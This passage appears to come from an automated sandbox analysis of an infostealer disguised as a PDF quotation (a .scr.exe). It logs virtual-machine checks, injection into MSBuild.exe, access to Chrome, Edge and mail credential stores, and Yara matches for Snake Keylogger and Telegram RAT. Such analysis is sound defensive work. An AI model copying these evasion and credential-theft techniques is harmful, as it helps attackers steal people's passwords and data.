Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594110s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99782	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99657	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98828	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98718	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98609	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98391	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98266	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98155	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98047	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97813	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97688	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97328	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97109	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96891	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96781	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96672	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96563	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96438	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96188	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596731	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595414	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597758	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597633	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$2
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorer?SbieDll.dll@select * from Win32_BIOS8Unexpected WMI query failureAversionBSerialNumberDVMware\|VIRTUAL\|A M I\|XenEselect * from Win32_ComputerSystemFmanufacturerGmodelHMicrosoft\|VMWare\|VirtualIjohnJannaKxxxxxxxx
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: osoft\|VMWare\|Virtual
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333007835.0000013735F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2342583727.0000013750340000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000 value starts with: 4D5A

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Thread register set: target process: 8188

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140002000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140044000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: CC9263D010	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Remote Access Functionality

